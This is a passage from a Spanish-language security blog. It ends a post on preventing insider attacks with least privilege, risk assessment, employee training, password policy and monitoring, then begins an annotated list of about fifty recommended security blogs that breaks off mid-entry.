corporativa y a datos confidenciales que podrían utilizar para llevar a cabo ataques maliciosos. - Exempleados - mientras que técnicamente pierden su acceso legítimo al terminar el contrato, no todas las empresas se molestan en eliminar adecuadamente las credenciales inactivas. Si un exempleado descubre que sus credenciales siguen funcionando, puede usarlas para llevar a cabo acciones maliciosas. Otro peligro potencial es una puerta trasera o una bomba lógica (software malicioso que se apaga automáticamente después de un período de tiempo establecido) que el antiguo empleado puede dejar atrás para poder acceder al sistema o sabotear las operaciones comerciales, mucho después de que se vaya. También es importante entender las razones comunes para cometer ataques con información privilegiada. En algunos casos, los cambios en el comportamiento de los empleados puede mostrar algunas pistas sobre lo que están planeando y permitirá prevenir un ataque interno antes de que se produzca. - Espionaje corporativo: los empleados pueden ser reclutados por la competencia a través de chantaje o soborno para transferir datos sensibles. Los casos de espionaje corporativo pueden ser muy difíciles de detectar. Si el empleado hace muchos viajes inesperados o de repente se tiene una afluencia de dinero, pueden ser acciones alarmantes. - Ganancia financiera personal: el empleado puede robar una base de datos de clientes para venderla en un mercado negro o comenzar un negocio competitivo. En este caso, a menudo se jacta ante sus colegas de ello, lo que puede ayudar a prevenir o detectar el ataque. - Venganza por injusticia - los empleados descontentos pueden llevar a cabo acciones maliciosas para devolver a la empresa la injusticia percibida por ellos. Las acciones maliciosas de venganza a menudo están diseñadas para generar tanto daño a la empresa como sea posible e interrumpir los procedimientos de negocio. - Errores no intencionados - en muchos casos, una fuga de información resulta ser un simple error por parte de un empleado, ya sea por hacer un clic en un enlace de correo electrónico sospechoso, decirle la contraseña a un colega, o enviar datos confidenciales a la persona equivocada. La posibilidad de tales amenazas involuntarias debe tenerse en cuenta y su prevención debe incluirse como parte de una estrategia general de prevención de ataques insider en la empresa. Comprender la naturaleza de los ataques insiders es un paso importante que ayudará a llevar a cabo una evaluación de riesgo más completa y así poder definir las principales debilidades de seguridad. ## Administración de credenciales Debe organizarse el trabajo asignando credenciales de tal manera que se limite el número de cuentas privilegiadas, restringiendo el acceso a la información sensible tanto como sea posible, creando un entorno de trabajo desfavorable para acciones maliciosas. Para lograr esto, hay dos principios principales que se deben seguir: - Principio de privilegios mínimos : cada nueva cuenta, de forma predeterminada debe crearse con el nivel de privilegios más bajo posible. El nivel de privilegios sólo debe ser elevado si es necesario. De esta manera se limita el número de cuentas privilegiadas dentro de la organización y nos aseguramos de que todas ellas tienen un propósito específico y están constantemente en uso. - Principio de separación de funciones: las funciones dentro de la organización deben ser divididos entre individuos tanto como sea posible, promoviendo la colaboración cada vez que una tarea compleja necesite ser resuelta. Estadísticamente, los empleados son mucho menos propensos a realizar acciones maliciosas cuando están colaborando con otros empleados. Por ejemplo, las acciones, como la copia de seguridad y la restauración de datos, deben separarse entre diferentes personas si es posible. Los dos principios mencionados trabajan juntos para minimizar las oportunidades de ataques con información privilegiada, fortaleciendo una postura general de seguridad de los datos de la organización. ## Evaluación de riesgos exhaustiva La evaluación de riesgos es un proceso necesario que permite identificar todos los puntos débiles de nuestra seguridad actual, dando una comprensión clara de lo que necesita ser securizado. Hay tres pasos principales para la evaluación de riesgos: - Identificar potenciales menazas - Identificar las vulnerabilidades de la organización ante estas amenazas - Identificar cuánto daño se produciría en caso de este tipo de ataque La información recibida dará una comprensión clara de qué medidas de seguridad deben implementarse y cómo se debe priorizar su implementación. La evaluación del riesgo debe llevarse a cabo periódicamente, así como en el momento en que se introduzcan cambios importantes en la seguridad o en la infraestructura de la red. Las amenazas internas deben examinarse como parte integral de un proceso de evaluación de riesgos. Como resultado, se debe obtener una comprensión clara de la efectividad de las medidas de prevención y protección de amenazas internas y cómo fortalecerlas. En general, los resultados de una evaluación de riesgo deben ser utilizados para construir y revisar la estrategia general de seguridad de la compañía, incluyendo la protección de las amenazas internas y externas. ## Trabajar en el conocimiento de la seguridad de los empleados En muchos casos, las infracciones de seguridad son causadas directamente por los empleados, que descuidan las reglas y las prácticas de seguridad más simples. Tales negligencias se dan tan a menudo que, que la educación en seguridad dentro de la empresa, debería ser continua. Los empleados son a menudo completamente inconscientes de ciertas prácticas de seguridad, o están dispuestos a saltarse dichas normas en favor de su propia conveniencia, sin darse cuenta de la gravedad de las consecuencias que pueden provocar, siendo el típico caso, el de "sacar el trabajo adelante". La única manera de remediar esta situación es llevar a cabo una formación de sensibilización de seguridad con el fin de familiarizar a los empleados con las últimas tendencias en seguridad y hacerles conscientes de cómo afectan ellos mismos a la seguridad cibernética de la empresa. Esto ayudará a reducir significativamente el número de errores cometidos por los empleados (ya que si son conscientes de las graves consecuencias de sus acciones, les inducirá a ser más cuidadosos), protegiéndose por ejemplo de la ingeniería social. Sabrán no sólo ignorar los enlaces en los correos electrónicos de spam, sino que también informarán a un compañero de trabajo de acciones inadecuadas. Al hacer que los empleados sean conscientes de las medidas de seguridad que se están tomando para controlar las amenazas internas, aislamos muchos problemas a un lado, creando un ambiente de trabajo saludable, basado en la confianza y disuadiendo a algunos de que lleven a cabo ataques insider. ## Gestión de cuentas y contraseñas El uso de cuentas compartidas o predeterminadas es una práctica frecuente y extendida en muchas organizaciones. Sin embargo, esto puede permitir que ciertos empleados obtengan acceso a cuentas privilegiadas que no deben tener. Prohibir el uso de cuentas compartidas sin control, es imprescindible para una seguridad confiable. También nos debemos asegurarse de que las cuentas están completamente protegidas por contraseñas complejas únicas, cambiadas de forma regular. Debemos cambiar inmediatamente cualquier contraseña por defecto que nuestra empresa pueda utilizar para cualquier software o hardware. Estas contraseñas suelen ser públicas y permitirán a los hackers y a los usuarios maliciosos tomar el control de los sistema fácilmente. Otra cosa importante es prohibir el uso compartido de contraseñas entre los empleados, así como el uso de una sola contraseña en varias cuentas sin ningún tipo de control. Con estos pequeños controles, no sólo estamos haciendo más difícil la vida a los insiders, sino que también estamos protegiendo los datos de ataques ajenos. Otra forma de reforzar la seguridad en las cuentas y asegurarnos de que una cuenta es utilizada por la persona correcta, es implementar un segundo factor de autenticación. Este sistema, implementado con dispositivos móviles o con tokens físicos, puede utilizarse para confirmar de forma fiable la identidad de la persona que intenta iniciar sesión, sirviendo como red de seguridad en caso de que se haya comprometido una contraseña. ## Realizar un seguimiento Monitorizar a los empleados es una gran prevención, existiendo herramientas de detección que ayudarán a disuadir eficazmente a los insiders y asegurando la integridad de los datos confidenciales. Un software profesional de monitorización, o un SIEM, dará una visibilidad completa de lo que los usuarios están haciendo, lo que proporciona la capacidad de detectar rápidamente los ataques de fuga de información, localizando si existe un culpable y emitiendo la consiguiente respuesta oportuna. - Supervisar las acciones del usuario. Muchas empresas se limitan a acceder a la supervisión o los logs de inicio de sesión del software y los sistemas que estamos utilizando. Sin embargo, en la mayoría de los casos esto no es suficiente, ya que el usuario podrá disimular fácilmente sus acciones dentro de su trabajo regular, modificando o desactivar la mayoría de los registros internos, o simplemente pasando desapercibido ante la rutina. Es mejor llevar a cabo un monitorización exhaustiva de las acción del usuario usando soluciones de monitorización dedicadas. Este software estará completamente protegido de la manipulación (Mandamos la información a un SIEM), siendo capaces de producir un registro completo de las acciones del usuario, permitiendo detectar de manera eficiente los ataques insiders. - Supervisar usuarios privilegiados. Los usuarios con cuentas privilegiadas suelen trabajar directamente con datos sensibles o con configuraciones críticas del sistema, teniendo todas las herramientas necesarias para realizar acciones maliciosas, pudiendo al mismo tiempo, desactivar cualquier supervisión predeterminada. Es importante utilizar herramientas diseñadas específicamente para manejar a dichos usuarios , como vimos con las soluciones PAM. - Monitorización de terceros y usuarios remotos. Terceros, como proveedores de servicios y subcontratas, no tienen necesariamente el mismo nivel de seguridad tanto de las amenazas internas como externas como se puede tener en nuestra propia organización. Cuando se accede a los datos confidenciales de forma remota, ya sea por terceros o por nuestros propios empleados, debemos asegurarnos de que se transfieran datos, sólo cuando estén cifrados, teniendo todas las sesiones remotas completamente supervisadas. Esto permitirá evitar los malicious insiders , asegurándose de que los empleados en remoto, no usen mal los datos confidenciales. - Alertas personalizadas y análisis de comportamiento. Uno de los mayores desafíos de la monitorización de acciones, es el procesamiento y tratamiento eficiente de una gran cantidad de datos recibidos. Las soluciones de monitorización, generalmente emplean sistemas de alerta personalizables que se pueden usar para crear alertas que se adapten mejor a nuestras situaciones particulares. Dichas alertas se dispararán en determinados eventos sospechosos, permitiendo que el personal de seguridad compruebe si hay una violación de datos o un uso indebido. Algunas soluciones utilizan sistemas de análisis de comportamiento más sofisticados que intentan detectar eventos sospechosos automáticamente. Dichos sistemas son muy recomendables y pueden dar buenos resultados, aunque son mucho más caros y tienden a producir muchos falsos positivos, por lo menos en un primer momento, hasta que son refinados. ### Conclusión Hemos visto a lo largo de estas seis pequeñas recomendaciones, como podemos prevenir los ataques insider , seis pequeños consejos que generan mucho impacto dentro de las organizaciones, que no son fáciles de alcanzar, pero que una vez puestos en marcha, podemos ver claramente una gran reducción, principalmente de acciones no malintencionadas, pero que podrían haber provocado graves daños si no se hubiesen localizado. Desde nuestro blog de seguridad , intentamos mejorar día a día, y hoy hemos intentado mejorar en el control de los ataques insiders , de su monitorización y mitigación. Espero que os sea de ayuda la información, y ahora, lo mas dificil de todo, poner estas buenas practicas en marcha. --- # Más de 50 de los mejores blogs de seguridad informática URL: https://ciberseguridad.blog/mas-de-50-de-los-mejores-blogs-de-seguridad-informatica/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-04-18 Actualizado: 2026-10-04 Tema: Noticias Seguridad > Desde nuestro blog de seguridad, os traigo una colección de los mejores blogs sobre seguridad de los principales líderes de la industria, aparte del nuestro propio, claro. Hay cientos y cientos de blogs sobre seguridad informática en la globosfera. Algunos son líderes indiscutibles en la industria, ampliamente reconocidos por casi todo el mundo en el campo de la seguridad. Algunos empezaron muy fuertes (He de decir que mantener un blog, requiere su esfuerzo), y fracasaron después de unos pocos Desde nuestro blog de seguridad, os traigo una colección de los mejores blogs sobre seguridad de los principales líderes de la industria, aparte del nuestro propio, claro. Hay cientos y cientos de blogs sobre seguridad informática en la globosfera. Algunos son líderes indiscutibles en la industria, ampliamente reconocidos por casi todo el mundo en el campo de la seguridad. Algunos empezaron muy fuertes (He de decir que mantener un blog, requiere su esfuerzo), y fracasaron después de unos pocos meses, mientras que otros blogs han generado cientos de pensamientos profundos sobre una variedad de temas de seguridad (Espero que este se convierta en uno de ellos). Examinamos la web para descubrir algunos de los mejores blogs de seguridad. No solo los blogs nombrados una y otra vez en las listas de mejores blogs de seguridad, sino también algunas joyas ocultas que quizás no conozcas, pero que te alegraras de conocer. Estos blogs proporcionan una visión profunda sobre alguno de los principales profesionales de la seguridad de la información. Estos bloggers de la industria, abordan las principales noticias de seguridad, hacks, trucos y descubrimientos sobre seguridad, ofrecen tutoriales y soluciones a problemas que han encontrado en su trabajo cotidiano. IMPORTANTE: Los blogs no aparecen en ningún orden en particular. Más bien, forman una colección de mas de 50 blogs de seguridad que creo que se desmarcan un poco del resto de esos cientos y cientos de los que anteriormente os hablaba. El sistema numérico se utiliza para hacer que sea fácil hacer referencia a un blog específico, pero no implica que el #1 sea mejor que #50. Así también, si consideras que debemos hablar sobre un blog en concreto que no esta aquí, háznoslo saber en los comentarios. ## 1. Wired’s Threat Level [Imagen: Blog Seguridad Wireds Threat Level] Wired es una publicación digital centrada en tecnología, pero no es ampliamente reconocida por su increíble difusión del ámbito de la seguridad. Wired habla sobre privacidad, delincuencia y seguridad online, investiga hacks inteligentes y soluciones e informando sobre las últimas noticias de seguridad que afectan a consumidores y profesionales. ## 2. El blog de seguridad de la información de Roger [Imagen: Blog Seguridad Roger’s Information Security Blog] Roger McClinton comenzó su blog en 2004, principalmente como un medio para recopilar enlaces e investigaciones. Pero a medida que pasaba el tiempo, comenzó a agregar comentarios y para su sorpresa, su blog desarrolló un importante número de lectores. Después de un breve paréntesis en la segunda mitad de 2013, Roger está de nuevo ofreciendo noticias y comentarios sobre seguridad. ## 3. DarkReading [Imagen: Blog Seguridad DarkReading] Si eres un profesional de la seguridad, probablemente ya habrás visitado el blog Dark Reading, al menos una vez, un blog que ha hecho un buen trabajo reforzando su posición como líder en las últimas noticias e información sobre seguridad. Con el objetivo de "ayudar a los profesionales de seguridad a gestionar el equilibrio entre la protección de datos y el acceso de los usuarios", y un panel de colaboradores que incluye alguno de los nombres más prestigiosos del sector, Dark Reading es claramente de lectura obligada. ## 4. Krebs on Security [Imagen: Blog seguridad Krebs] Brian Krebs es un nombre familiar en el mundo de la seguridad informática, y su blog está entre uno de los más conocidos y respetados en el sector. Un reportero de investigación, Krebs proviene de un periodismo de antecedentes y ha perfeccionado su experiencia autodidacta a través de más de una década de interés en la seguridad. Se le acredita haber descubierto la brecha de datos de Target y ser el primero en reportar el gusano Stuxnet en 2010. ## 5. ThreatPost [Imagen: Blog Seguridad ThreatPost] Es dificil encontrar una lista de los mejores blogs de seguridad que no incluya el blog ThreatPost. Bajo el nombre de "Servicio de Noticias de Seguridad de Kaspersky Labs", ThreatPost está dirigido por un equipo de reconocidos expertos en el sector de la información, centrado en temas como privacidad, seguridad web, vulnerabilidades y más. ## 6. IT Security Guru [Imagen: Blog Seguridad IT Security Guru] Todas las noticias de seguridad de última hora que necesitas conocer para estar al tanto de los últimos acontecimientos en la industria se encuentran en IT Security Guru. Con el objetivo de recopilar todas las noticias de la industria más importantes y urgentes en un solo lugar, IT Security Guru centraliza esta importancia sin pasar horas buscando en Internet o saltando por docenas de blogs y sitios de noticias. ## 7. El blog de Dan Kaminsky [Imagen: Blog-Seguridad-Dan-Kaminsky] Dan Kaminsky ha asesorado a compañías Fortune 500 como Cisco, Avaya y Microsoft, y ha sido un reconocido investigador de seguridad en esta última década. Su blog, anteriormente conocido como DoxPara Research, cuenta con posts de gran profundidad con información sobre los problemas de seguridad con los que se enfrenta la industria, como Heartbleed. El blog es como recorrer el cerebro de Kaminsky desde la comodidad del escritorio. ## 8. Security Weekly [Imagen: Blog Seguridad Security Weekly] Security Weekly de Paul Asadoorian ofrece una transmisión semanal de video en directo, junto con mensajes escritos, que cubren las últimas noticias de seguridad informática, técnicas de hackers, tutoriales, investigaciones sobre seguridad y más. Con una mezcla de contenido técnico y entretenimiento, el objetivo de Security Weekly es "utilizar nuevas tecnologías para llegar a un público más amplio en todo el mundo para enseñar a la gente cómo crecer, aprender y ser ninjas de seguridad". ## 9. Kevin Townsend’s IT Security [Imagen: Blog Seguridad Kevin Townsend’s] El blog de seguridad de Kevin Townsend pretende presentar y discutir la seguridad de la información de una manera "nueva y desafiante". Un panel de expertos líderes en seguridad de la información aporta regularmente, ofreciendo una perspectiva experta en muchas de las noticias e incidentes que afectan el campo de la seguridad de la información hoy. Como colaboradores tenemos a Dr. Brian Bandey, David Harley, Bev Robb, y otros líderes, así como, por supuesto, el propio Townsend. ## 10. BH Consulting IT Security Watch [Imagen: Blog Seguridad BH Consulting IT Security Watch] Dirigido por Brian Honan y Lee Munson, BH Consultoría IT Security Watch cubre noticias de seguridad y noticias importantes de violación de datos que impactan a consumidores y empresas. El blog es una publicación digital mensual que destaca las noticias y artículos más interesantes relacionados con el campo de la seguridad. Gran parte de la cobertura es relevante en todo el mundo, con algunas noticias específicas de BH Consulting ## 11. Liquidmatrix Security Digest [Imagen: Blog Seguridad Liquidmatrix Security Digest] Liquidmatrix se compromete a proporcionar artículos de larga duración y una cobertura en profundidad de noticias e información de seguridad de la información, rebelándose contra la tendencia a la cobertura superficial sin valor agregado. La creatividad de Dave Lewis el cual tiene un trabajo a diario en Akamai y el que ha estado trabajando en el campo de la seguridad informática durante dos décadas. Liquidmatrix ha estado en marcha desde 1998, por lo que es uno de los blog de seguridad más antiguos. ## 12. Guru de la informática [Imagen: Blog Seguridad Gurú de la informática] Blog de carácter técnico actualizado a menudo y con una media de actividad alta. Blog que describe y nos transmite multitud de herramientas de seguridad. Un blog que no conocía hasta el día de hoy al buscar información para crear el post , y que me ha sorprendido gratamente. ## 13. Hackaday [Imagen: Blog Seguridad Hackaday] Hack a Day es una revista en línea que publica hacks cada día, así como un especial semanal sobre "Cómo" hackear. Un hack o truco se refiere a las modificaciones de un producto o software, así como la creación de algo totalmente nuevo. No es un blog de seguridad propiamente dicho, pero es un punto de conocimiento que cualquier hacker o curioso informático sabrá valorar y tener en cuenta. ## 14. Andrew Hay [Imagen: Blog Seguridad Andrew Hay] Andrew Hay dirigió los esfuerzos de investigación para Open DNS en 2015, donde desempeñó como Senior Security Research Lead & Evangelist hasta alcanzar su actual puesto de Chief Technology Officer. Se le pide a menudo que proporcione comentarios expertos sobre el estado de la industria de la seguridad en distintos medios de comunicación, incluyendo publicaciones en USA Today , TechTarget y Network World. Pero podemos ver su opinión personal en su propio blog, donde cubre temas basados en su propio interés personal y la propia industria de la seguridad. ## 15. HorneyCyber McGrew [Imagen: Blog Seguridad HorneyCyber] Wesley McGrew es profesor asistente de investigación en la Universidad Estatal de Mississippi en el Departamento de Ciencias de la Computación e Ingeniería. Su blog, McGrew Security convertido para su empresa Horne Cyber, es un reflejo de sus intereses de investigación, así como otras noticias y eventos de seguridad de la información, incluyendo análisis de vulnerabilidad, ingeniería inversa, operaciones cibernéticas ofensivas, forenses digitales y otros temas de interés para los profesionales de la seguridad. ## 16. Schneier on security [Imagen: Blog Seguridad Schneier on security] El blog de Bruce Schneier es otro de esos imprescindibles para una lista como esta. Schneier on Security lleva más de 10 año de liderazgo en seguridad informática, centrado en temas como la criptografía, la privacidad y el gobierno. Un reconocido experto en criptografía, Bruce es un gran autor y orador. ## 17. NoticeBored [Imagen: noticebored Blog] Gary Hinson es el blogger detrás de NoticeBored, donde cubre temas de seguridad de la información realmente interesantes. Hinson nació y estudió en el Reino Unido y trabajó en Londres, Swindon, Bristol y Bruselas antes de trasladarse a Nueva Zelanda. Hinson abarca temas de interés para los consumidores y profesionales de la seguridad, con un estilo informal que le permite hablar sobre Complejos acontecimientos de seguridad en un lenguaje que todo el mundo puede entender. ## 18. Emergent Chaos [Imagen: Blog Seguridad Emergent Chaos] Dirigido por un grupo de colaboradores expertos, Emergent Chaos se enfoca en seguridad, privacidad, libertad, economía y temas similares. El blog fue fundado por Adam Shostack, autor de Modelado de amenazas: Threat Modeling: Designing for Security y co-autor de The New School of Information Security. Iniciado en 2004, Emergent Chaos es el hogar de cientos de mensajes ingeniosos con ideas sobre casi todo lo relacionado con la seguridad y la privacidad, junto con algunas reflexiones al azar, formando una lectura informativa y entretenida. ## 19. Flyingpenguin [Imagen: Blog Seguridad Flyingpenguin] Davi Ottenheimer, David Willson, Matthew Wallace y Bryan Zimmer forman parte del equipo de la consultora de seguridad flyingpenguin. Davi Ottenheimer es el principal blogger detrás del blog flyingpenguin, ofreciendo un análisis en profundidad de las noticias, eventos y desarrollos de seguridad de la información. ## 20. Elie Bursztein [Imagen: Blog Seguridad Elie Bursztein] Elie Bursztein lidera los esfuerzos de investigación anti-abuso de Google, compartiendo sus ideas sobre temas relevantes para el mundo de la seguridad informática en su blog personal. Bursztein tiene algunos logros impresionantes, como el re-diseño de CAPTCHA de Google facilitando el mismo (un esfuerzo muy apreciado por los usuarios de Internet en todas partes) o la implementación de criptografía más rápida para hacer Chrome más seguro, identificar y reportar más de 100 vulnerabilidad de seguridad a empresas como Apple, Microsoft, Twitter y Facebook. ## 21. Graham Cluley [Imagen: Blog Seguridad Graham Cluley] Graham Cluley tiene casi 60000 seguidores en Twitter, y no es ninguna sorpresa dada su impresionante cobertura de noticias y desarrollos en el mundo de la seguridad informática. Analista de seguridad informática independiente, ha estado trabajando en seguridad desde la década de 1990, dándole experiencia para ofrecer comentarios de expertos sobre los últimos acontecimientos en seguridad de la información y temas relacionados. Pero no es sólo la experiencia Cluley lo que podemos obtener en su blog, podremos encontrar un montón de consejos para los usuarios y profundas ideas sobre los desarrollos de seguridad más críticos. ## 22. PerezBox [Imagen: log Seguridad PerezBox] Tony Perez es CEO de Sucuri, aunque prefiere llamarse a sí mismo principalmente Evangelista, una compañía que dirige con Daniel Cid , también conocido como el Fundador del proyecto OSSEC - Sistema de Detección de Intrusión de Host (HIDS) ,pretende expresar sus pensamientos y perspectivas sobre una multitud de temas, con un enfoque particular en sus áreas de interés y experiencia. ## 23. eLearn Security [Imagen: Blog eLearn Security] ELearn Security es un proveedor líder de cursos de seguridady pruebas de pentesting para profesionales. El blog de la compañía es un valioso recurso de información sobre noticias de seguridad, con cobertura de importantes brechas de seguridad que afectan a las empresas y los usuarios, como la infracción de Home Depot, fugas de credenciales de inicio de sesión de Gmail y eventos similares. ## 24. HolisticInfoSec [Imagen: Blog Seguridad HolisticInfoSec] Russ McRee ha participado en importantes conferencias de seguridad, como Defcon, BlackHat, RSA y otros, y trabaja para el equipo de seguridad y cumplimiento de Microsoft Online Services. También escribe toolsmith, una columna mensual en ISSA Journal, pero comparte muchas de sus opiniones y perspectivas sobre su creencia en un enfoque holístico de la seguridad de la información en HolisticInfoSec. ## 25. Hacking Articles [Imagen: Blog Seguridad Hacking Articles] Fundada y escrita por Raj Chandel, Hacking Articles es una fuente completa de información sobre seguridad informática, hacking ético, pentesting y otros temas de interés para los profesionales de la seguridad de la información. Los principales intereses de Chandel radican en la investigación de vulnerabilidades y explotación de sistemas, pero tambien podrás encontrar herramientas, recursos y tutoriales sobre todo, desde ingeniería social hasta footprinting, hacking mediante Google y mucho más. ## 26. SkullSecurity [Imagen: Blog Seguridad SkullSecurity] Tras abrir en agosto de 2008, SkullSecurity es el hogar de cientos de artículos sobre seguridad, violaciones de datos, y muchas ideas generales escritas desde las trincheras y basadas en la experiencia profesional del blogger Ron Bowes. Los posts de Bowes son igual de entretenidos que informativos, haciendo de su blog una lectura intrigante. ## 27. Security Through Education [Imagen: Blog Seguridad Security Through Education] Desde Security Through Education se centra en la mezcla de la ciencia, la psicología y el arte de la ingeniería social y cómo es utilizado por los hackers y entusiastas de la seguridad. Todo esto, de la mano de un equipo de ingenieros sociales, psicólogos, investigadores, científicos y entusiastas de la seguridad. Además del blog, encontrarás un boletín de noticias, un podcast y mucho más para asegurarte de estar siempre informado, entretenido y nunca fuera de los medios de comunicación. ## 28. Un informático en el lado del mal [Imagen: Blog Seguridad Un informático en el lado del mal] Como bien indica la descripción de la web "Blog personal de Chema Alonso, sobre seguridad, hacking, hackers, Cálico Electrónico y sus paranoias." aunque tambien indica consultor de seguridad en Informática 64, un poco antiguo, ya que en este tiempo, Chema Alonso se ha convertido en una de las figuras más emblemáticas y conocidas de Telefónica, siendo el primero de los consejeros en ir en camiseta, y de las Frikis, "Creo" ya que no he tenido acceso a ninguna junta. ## 29. Jeff Soh on NetSec [Imagen: Blog Seguridad Jeff Soh on NetSec] Jeff Soh comenzó a publicar en sus blogs en 2007 y continúa compartiendo sugerencias sobre los nuevos analista de intrusiones y otras noticias sobre seguridad de la información. Soh también ofrece recomendaciones de libros, recomendaciones de productos y consejos útiles para los profesionales de la seguridad de la información y los usuarios diarios. ## 30. Lucius on Security [Imagen: Blog Seguridad Lucius on Security] Lucius Lobo es un evangelista de la seguridad y autor de StaySafe Cybercitizen. Profesionalmente, Lobo encabeza una unidad de negocios de servicios de seguridad especializada en India para TechMahindra. En Lucius on Security, escribe sobre los problemas y riesgos que afectan a los usuarios de Internet, incluyendo el cibercrimen, la suplantación de identidad, la privacidad y la seguridad, mientras trabaja para reducir el cibercrimen a algunas de las compañías más grandes del mundo. Sus publicaciones proporcionan consejos valiosos para padres, niños y cualquier persona que utilice la web. ## 31. Sophos Naked Security [Imagen: Blog Seguridad Sophos Naked Security] El blog Naked Security de Sophos es un gran escaparate de noticias de seguridad. El blog cuenta con contenido de una amplia gama de expertos en seguridad con un enfoque en malware, privacidad de los consumidores, seguridad en medios sociales y mucho más. ## 32. El blog de gestión de identidad de Matt Flynn [Imagen: Blog Seguridad El blog de gestión de identidad de Matt Flynn] Matt Flynn es un especialista en seguridad de la información y gestión de identidades que trabaja en Oracle. Su blog personal, que refleja sus propias opiniones y no las de Oracle, cubre administración y seguridad de identidades, software, servicios, procesos y análisis. El blog, creado desde 2006, ha construido una impresionante colección de opiniones y perspectivas a lo largo de los años sobre temas que afectan a los profesionales de la seguridad de la información. ## 33. El blog de Marco Ramilli [Imagen: Blog Seguridad El blog de Marco Ramilli] Marco Ramilli es un investigador informático con fondo de hacking, cuenta con un impresionante historial de trabajo con el Gobierno de los Estados Unidos y varias universidades líderes en nuevos paradigmas de seguridad, metodologías de prueba de pentesting y seguridad de sistemas de votación electrónica y Malware. Su blog, que comenzó en 2007, es un reflejo de sus muchas experiencias en el campo de la seguridad en sus múltiples funciones. Ramilli, autodescripto en su perfil de LinkedIn como experto en hacking ético, ataques específicos dirigidos y evasión de malware, ha obtenido múltiples galardones y premios por su trabajo. ## 34. Blog de WiKid [Imagen: Blog Seguridad de WiKid] WiKID es una solución de autenticación de dos factores y el blog de la compañía es una valiosa fuente de información sobre autenticación, seguridad, noticias importantes de la industria y otra información. Encontrará consejos y tutoriales, información sobre riesgos, recursos, noticias de seguridad sobre Google y medios sociales y otra información relevante. ## 35. CSO [Imagen: Blog Seguridad CSO] CSO proporciona noticias, análisis e investigaciones sobre una amplia gama de temas de seguridad y gestión de riesgos. Las áreas de interés incluyen seguridad de la información, seguridad física, continuidad del negocio, gestión de identidad y acceso, prevención de pérdidas y más. ## 36. Blog de Robert Penz [Imagen: Blog Seguridad Robert Penz] El Blog de Robert Penz cubre información sobre Linux y código abierto en general, junto con consejos, trucos, pequeños scripts y seguridad de la información. Robert se interesó por la seguridad cuando era estudiante, hasta realizar su tesis relacionada con el campo de la seguridad; Gran parte del blog está relacionado con la seguridad de la información como resultado de su pasión. ## 37. Packet Storm Security [Imagen: Blog Seguridad Packet Storm Security] Packet Storm Security es un sitio web de seguridad de información popular que ofrece herramientas de seguridad informática actuales e históricas, exploits, y advertencias de seguridad. Es operado por un grupo de aficionados a la seguridad que publican nueva información de seguridad y ofrecen herramientas para fines educativos y de prueba.Un lugar con mucho conocimiento y muy útil en cuanto a herramientas a usar dentro del mundo de la seguridad. ## 38. The Security Ledger [Imagen: Blog Seguridad The Security Ledger] The Security Ledger está dirigido por Paul Roberts, ex editor de ThreatPost y analista de 451 Research y Kaspersky Lab. El blog independiente se centra en la ciberseguridad, aportando información sobre temas como el Internet de las cosas, el malware, la política gubernamental y la seguridad del consumidor. ## 39. InfoSec Island [Imagen: Blog Seguridad InfoSec Island] InfoSec Island tiene como objetivo proporcionar a los profesionales de TI y redes la oportunidad de encontrar ayuda e información de forma rápida y sencilla, combinando una comunidad en línea, un portal de noticias en seguridad y una red social. El blog de Infosec Island cuenta con varios colaboradores e incluye información sobre la cloud, malware, ciberataques y más temas relacionados con la seguridad de la información. Actualización 04/06/22 - Web inacesible ## 40. Lenny Zeltser on Information security [Imagen: Blog Seguridad Lenny Zeltser on Information security] Dedicada a promover la seguridad de la información y la lucha contra el malware, Lenny Zeltser es un líder de negocios y tecnología con multiples años de experiencia en tecnología de la información y seguridad. Lenny escribe a menudo sobre seguridad de la información, incluyendo un libro en el que es co-autor, artículos para diversas publicaciones, y su blog diario de seguridad de la información. ## 41. InfoSecurity [Imagen: Blog Seguridad InfoSecurity] Infosecurity Magazine cuenta con más de once años de experiencia en conocimientos sobre la industria de la seguridad de la información. Su contenido editorial premiado con múltiples premios ofrece características atractivas, centrandose en temas y tendencias de seguridad, análisis de noticias en profundidad y columnas de opinión de expertos de la industria. También ofrece contenido educativo gratuito, aprobado por los principales organismos acreditados de la industria. ## 42. Cyber Sins [Imagen: Blog Seguridad Cyber Sins] Cyber Sins es el blog de Rishi Narang, consultor, escritor e investigador que se centra en la ciberseguridad y la inteligencia de amenazas. El blog ofrece información sobre ataques cibernéticos, seguridad web y más temas en seguridad de la información. ## 43. El Dr. InfoSec [Imagen: Blog Seguridad El Dr. InfoSec] El blog del Dr. InfoSec está dirigido por Christophe Veltsos, Doctorado que imparte clases sobre la seguridad de la información y las ciberguerras. El Dr. Veltsos busca "diagnosticar y tratar problemas cotidianos de seguridad de la información" en su blog, que cubre riesgos, ciberseguridad y otros temas importantes para la seguridad de la información. Muchos de los posts contienen enlaces a fuentes originales, incluyendo videos y artículos. ## 44. Tech Wreck InfoSec Blog [Imagen: Blog Seguridad Tech Wreck InfoSec] El blog Tech Wreck InfoSec esta dirigido por un Ingeniero de Aseguramiento de la Información, que abarca una variedad de temas relacionados con la seguridad de la información y noticias relacionadas. El blog proporciona artículos útiles, tanto para los consumidores como para los profesionales de la seguridad. ## 45. Uncommon Sense Security [Imagen: Blog Seguridad Uncommon Sense Security] Uncommon Sense Security es el blog de Tenable Network Security Strategist y el cofundador de seguridad BSides, Jack Daniel. Mientras que las actualizaciones de Jack no son tan frecuentes como lo fueron al inicio, su blog sigue sirviendo como un centro de conocimiento en seguridad informática en temas como vulnerabilidades, seguridad en pequeñas empresas, violaciones de datos, y más. Un autodescripto "curmudgeon en seguridad", las ideas de Jack, las opiniones y el estilo de escritura humorístico siempre merecen una lectura. ## 46. TaoSecurity [Imagen: Blog Seguridad Tao Security] TaoSecurity es el blog de Richard Bejtlich, Jefe de estrategia de FireEye. Durante más de una década, TaoSecurity ha sido una fuente de experiencia en ciberseguridad, hacking, estrategia de seguridad, amenazas y mucho más. Richard es un autor de seguridad reconocido y su blog contiene una gran cantidad de recursos de seguridad educativa. ## 47. ... y nos conocerá por el camino de los bits [Imagen: Blog Seguridad Trailofbits] "And You Will Know Us by the Trail of Bits" es el blog oficial de Trail of Bits, una empresa de consultoría de seguridad fundada por Dan Guido y Alexander Sotirov. El blog ofrece asesoramiento experto en informática basado en la experiencia de consultoría en algunos de los programas de seguridad más avanzados. El blog ofrece un excelente contenido educativo centrado en vulnerabilidades, exploits, malware y más. ## 48. El blog de Veracode [Imagen: Blog Seguridad Veracode] El blog de la empresa de seguridad de aplicaciones Veracode se ha convertido en una de las principales fuentes de noticias e ideas de appsec. Con contribuciones regulares de expertos en seguridad como Chris 